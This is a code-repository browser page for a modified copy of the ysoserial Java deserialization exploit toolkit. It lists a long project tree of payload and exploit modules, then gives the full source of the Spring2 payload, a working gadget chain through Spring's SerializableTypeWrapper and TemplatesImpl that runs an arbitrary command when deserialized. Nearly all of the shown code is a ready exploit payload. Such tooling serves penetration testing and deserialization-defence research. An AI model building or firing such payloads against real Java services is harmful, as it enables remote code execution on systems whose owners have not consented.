• Search by APIs
• Search by Words
• Search Projects

• Java
• Python
• JavaScript
• TypeScript
• C++
• Scala
• Blog

• ysoserial-modified-master
  • src
    • main
      • java
        • ysoserial
          • exploit
            • JenkinsListener.java
            • RMIRegistryExploit.java
            • JBoss.java
            • JSF.java
            • JenkinsReverse.java
            • JRMPClassLoadingListener.java
            • JRMPClient.java
            • JRMPListener.java
            • JenkinsCLI.java
          • Serializer.java
          • GeneratePayload.java
          • secmgr
            • ThreadLocalSecurityManager.java
            • ExecCheckingSecurityManager.java
            • DelegateSecurityManager.java
          • Deserializer.java
          • payloads
            • BeanShell1.java
            • JavassistWeld1.java
            • Myfaces2.java
            • CommonsCollections2.java
            • Spring2.java
            • JBossInterceptors1.java
            • CommonsCollections4.java
            • Spring1.java
            • MozillaRhino1.java
            • Hibernate1.java
            • JRMPClient.java
            • JSON1.java
            • util
              • ClassFiles.java
              • CmdExecuteHelper.java
              • JavaVersion.java
              • Reflections.java
              • PayloadRunner.java
              • Gadgets.java
            • FileUpload1.java
            • JRMPListener.java
            • Jython1.java
            • Myfaces1.java
            • Hibernate2.java
            • Wicket1.java
            • Groovy1.java
            • DynamicDependencies.java
            • ROME.java
            • C3P0.java
            • annotation
              • PayloadTest.java
              • Dependencies.java
            • CommonsCollections1.java
            • Jdk7u21.java
            • CommonsCollections3.java
            • CommonsBeanutils1.java
            • CommonsCollections5.java
            • CommonsCollections6.java
            • ReleaseableObjectPayload.java
            • ObjectPayload.java
    • test
      • java
        • nanohttpd-2.1.0.jar
        • ysoserial
          • exploit
            • RMIRegistryExploitTest.java
          • WrappedTest.java
          • CustomPayloadArgs.java
          • CustomDeserializer.java
          • CustomTest.java
          • Throwables.java
          • payloads
            • RemoteClassLoadingTest.java
            • PayloadsTest.java
            • MyfacesTest.java
            • JRMPReverseConnectSMTest.java
            • FileUploadTest.java
            • JRMPReverseConnectTest.java
            • TestHarnessTest.java
  • all.policy
  • pom.xml
  • README.md
  • DISCLAIMER.txt
  • target
    • classes
      • ysoserial
        • exploit
          • JenkinsReverse.class
          • JBoss$ConnectionProviderContextImpl.class
          • RMIRegistryExploit$1.class
          • JRMPClassLoadingListener.class
          • JenkinsCLI.class
          • JBoss.class
          • JSF.class
          • JenkinsCLI$1.class
          • JRMPClient.class
          • JenkinsListener.class
          • JRMPListener$Dummy.class
          • JBoss$1.class
          • JBoss$ConnectionProviderContextImpl$1.class
          • JRMPListener$1.class
          • JRMPListener.class
          • RMIRegistryExploit.class
          • JRMPClient$MarshalOutputStream.class
          • JBoss$ConsoleLogHandler.class
          • JBoss$ConnectionHandlerContextImpl.class
          • JRMPListener$2.class
        • Deserializer.class
        • GeneratePayload$ToStringComparator.class
        • secmgr
          • ThreadLocalSecurityManager.class
          • DelegateSecurityManager.class
          • ExecCheckingSecurityManager.class
          • ExecCheckingSecurityManager$1.class
          • ExecCheckingSecurityManager$ExecException.class
        • GeneratePayload.class
        • Serializer.class
        • payloads
          • CommonsCollections4.class
          • JBossInterceptors1.class
          • Spring2.class
          • Jdk7u21.class
          • JavassistWeld1.class
          • JavassistWeld1$1.class
          • CommonsCollections1.class
          • JRMPClient.class
          • Hibernate2.class
          • Spring1.class
          • Wicket1.class
          • util
            • ClassFiles.class
            • PayloadRunner$1.class
            • Gadgets$Foo.class
            • Gadgets.class
            • Reflections.class
            • Gadgets$StubTransletPayload.class
            • PayloadRunner.class
            • JavaVersion.class
            • CmdExecuteHelper.class
          • DynamicDependencies.class
          • JBossInterceptors1$1.class
          • ReleaseableObjectPayload.class
          • CommonsCollections3.class
          • CommonsCollections2.class
          • CommonsBeanutils1.class
          • Myfaces1.class
          • FileUpload1.class
          • JRMPListener.class
          • Myfaces2.class
          • annotation
            • Dependencies.class
            • Dependencies$Utils.class
            • PayloadTest.class
          • CommonsCollections6.class
          • Groovy1.class
          • C3P0$PoolSource.class
          • ROME.class
          • ObjectPayload$Utils.class
          • Jython1.class
          • JSON1.class
          • Hibernate1.class
          • C3P0.class
          • ObjectPayload.class
          • MozillaRhino1.class
          • CommonsCollections5.class
          • BeanShell1.class
    • ysoserial-0.0.5-SNAPSHOT.jar
    • test-classes
      • ysoserial
        • CustomPayloadArgs.class
        • Throwables.class
        • exploit
          • RMIRegistryExploitTest.class
        • WrappedTest.class
        • CustomDeserializer.class
        • CustomTest.class
        • payloads
          • JRMPReverseConnectSMTest$1.class
          • MyfacesTest$1.class
          • PayloadsTest$1.class
          • RemoteClassLoadingTest$RemoteClassLoadingTestCallable.class
          • PayloadsTest$3.class
          • JRMPReverseConnectSMTest.class
          • PayloadsTest.class
          • TestHarnessTest$ExecMockPayload.class
          • TestHarnessTest.class
          • MyfacesTest$MyfacesDeserializer$MockRequestContext.class
          • MyfacesTest.class
          • TestHarnessTest$ExecMockSerializable.class
          • MyfacesTest$MyfacesDeserializer$MockELResolver.class
          • TestHarnessTest$NoopMockPayload.class
          • FileUploadTest.class
          • RemoteClassLoadingTest.class
          • PayloadsTest$2.class
          • RemoteClassLoadingTest$Exploit.class
          • JRMPReverseConnectTest.class
          • MyfacesTest$MyfacesDeserializer.class
    • maven-archiver
      • pom.properties
    • maven-status
      • maven-compiler-plugin
        • compile
          • default-compile
            • createdFiles.lst
            • inputFiles.lst
        • testCompile
          • default-testCompile
            • createdFiles.lst
            • inputFiles.lst
  • LICENSE.txt

package ysoserial.payloads;


import static java.lang.Class.forName;

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Type;

import javax.xml.transform.Templates;

import org.springframework.aop.framework.AdvisedSupport;
import org.springframework.aop.target.SingletonTargetSource;

import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.CmdExecuteHelper;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;


/**
 * 
 * Just a PoC to proof that the ObjectFactory stuff is not the real problem.
 * 
 * Gadget chain:
 * TemplatesImpl.newTransformer()
 * Method.invoke(Object, Object...)
 * AopUtils.invokeJoinpointUsingReflection(Object, Method, Object[])
 * JdkDynamicAopProxy.invoke(Object, Method, Object[])
 * $Proxy0.newTransformer()
 * Method.invoke(Object, Object...)
 * SerializableTypeWrapper$MethodInvokeTypeProvider.readObject(ObjectInputStream)
 * 
 * @author mbechler
 */

@Dependencies ( {
    "org.springframework:spring-core:4.1.4.RELEASE", "org.springframework:spring-aop:4.1.4.RELEASE", 
    // test deps
    "aopalliance:aopalliance:1.0", "commons-logging:commons-logging:1.2"
} )
@PayloadTest ( precondition = "isApplicableJavaVersion")
public class Spring2 extends PayloadRunner implements ObjectPayload<Object> {

    public Object getObject ( CmdExecuteHelper cmdHelper ) throws Exception {
        final Object templates = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());

        AdvisedSupport as = new AdvisedSupport();
        as.setTargetSource(new SingletonTargetSource(templates));

        final Type typeTemplatesProxy = Gadgets.createProxy(
            (InvocationHandler) Reflections.getFirstCtor("org.springframework.aop.framework.JdkDynamicAopProxy").newInstance(as),
            Type.class,
            Templates.class);

        final Object typeProviderProxy = Gadgets.createMemoitizedProxy(
            Gadgets.createMap("getType", typeTemplatesProxy),
            forName("org.springframework.core.SerializableTypeWrapper$TypeProvider"));

        Object mitp = Reflections.createWithoutConstructor(forName("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider"));
        Reflections.setFieldValue(mitp, "provider", typeProviderProxy);
        Reflections.setFieldValue(mitp, "methodName", "newTransformer");
        return mitp;
    }

    public static void main ( final String[] args ) throws Exception {
        PayloadRunner.run(Spring2.class, args);
    }
    
    public static boolean isApplicableJavaVersion() {
        return JavaVersion.isAnnInvHUniversalMethodImpl();
    }

}